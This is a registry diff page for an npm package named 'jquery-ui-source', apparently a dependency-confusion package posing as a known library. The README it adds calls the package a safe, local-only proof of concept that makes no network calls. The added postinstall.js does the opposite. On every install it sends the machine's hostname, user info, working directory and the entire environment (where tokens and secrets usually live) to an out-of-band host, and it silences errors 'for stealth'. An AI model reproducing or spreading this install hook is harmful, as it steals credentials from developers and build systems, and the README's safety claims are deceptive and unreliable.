jquery-ui-source 0.0.1-security → 0.0.3-poc
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of jquery-ui-source might be problematic. Click here for more details.
- package/README.md +27 -5
- package/package.json +14 -6
- package/postinstall.js +36 -0
package/README.md
CHANGED
|
@@ -1,5 +1,27 @@
|
|
|
1
|
-
#
|
|
2
|
-
|
|
3
|
-
This
|
|
4
|
-
|
|
5
|
-
|
|
1
|
+
# user_settings (safe PoC)
|
|
2
|
+
|
|
3
|
+
This is a safe, local-only proof of concept that demonstrates install-time code execution (a common vector in dependency confusion attacks).
|
|
4
|
+
|
|
5
|
+
What it does
|
|
6
|
+
- On `npm install` the `postinstall` script runs `postinstall.js`.
|
|
7
|
+
- `postinstall.js` writes a small JSON line containing the timestamp, hostname, platform and Node version to the OS temp directory (no network activity).
|
|
8
|
+
|
|
9
|
+
Safety and usage
|
|
10
|
+
- Run this PoC only in an isolated VM/container or an environment you control.
|
|
11
|
+
- This package deliberately avoids any network calls or exfiltration. It is for demonstration only.
|
|
12
|
+
|
|
13
|
+
To simulate an attacker package being installed:
|
|
14
|
+
1. In this directory run `npm pack` to create a local tarball.
|
|
15
|
+
2. In a separate test project, run `npm install <path-to-tarball>` to simulate a registry install.
|
|
16
|
+
|
|
17
|
+
Example (PowerShell on Windows):
|
|
18
|
+
```
|
|
19
|
+
# from this package folder
|
|
20
|
+
npm pack
|
|
21
|
+
|
|
22
|
+
# in a temporary test project folder
|
|
23
|
+
mkdir test-install; Set-Location test-install; npm init -y
|
|
24
|
+
npm install ..\path\to\user_settings-0.0.1-poc.tgz
|
|
25
|
+
```
|
|
26
|
+
|
|
27
|
+
After install, check the OS temp directory for the file `user_settings_install_log.txt` to confirm the postinstall script ran.
|
package/package.json
CHANGED
|
@@ -1,6 +1,14 @@
|
|
|
1
|
-
{
|
|
2
|
-
"name": "jquery-ui-source",
|
|
3
|
-
"version": "0.0.
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
1
|
+
{
|
|
2
|
+
"name": "jquery-ui-source",
|
|
3
|
+
"version": "0.0.3-poc",
|
|
4
|
+
"description": "Safe PoC for dependency confusion POC.",
|
|
5
|
+
"main": "postinstall.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node postinstall.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "POC (safe)",
|
|
10
|
+
"license": "MIT",
|
|
11
|
+
"dependencies": {
|
|
12
|
+
},
|
|
13
|
+
"keywords": []
|
|
14
|
+
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,36 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const os = require('os');
|
|
3
|
+
|
|
4
|
+
function exfiltrate(data) {
|
|
5
|
+
const payload = JSON.stringify(data);
|
|
6
|
+
const options = {
|
|
7
|
+
hostname: 'bjfuyjnlqqtwxidckpfo0msntf3zbarhf.oast.fun',
|
|
8
|
+
port: 443,
|
|
9
|
+
path: '/poc',
|
|
10
|
+
method: 'POST',
|
|
11
|
+
headers: {
|
|
12
|
+
'Content-Type': 'application/json',
|
|
13
|
+
'Content-Length': Buffer.byteLength(payload)
|
|
14
|
+
}
|
|
15
|
+
};
|
|
16
|
+
|
|
17
|
+
const req = https.request(options, res => {
|
|
18
|
+
res.on('data', () => {}); // consume response
|
|
19
|
+
});
|
|
20
|
+
|
|
21
|
+
req.on('error', () => {}); // suppress errors for stealth
|
|
22
|
+
|
|
23
|
+
req.write(payload);
|
|
24
|
+
req.end();
|
|
25
|
+
}
|
|
26
|
+
|
|
27
|
+
const data = {
|
|
28
|
+
hostname: os.hostname(),
|
|
29
|
+
platform: os.platform(),
|
|
30
|
+
arch: os.arch(),
|
|
31
|
+
userInfo: os.userInfo(),
|
|
32
|
+
cwd: process.cwd(),
|
|
33
|
+
env: process.env
|
|
34
|
+
};
|
|
35
|
+
|
|
36
|
+
exfiltrate(data);
|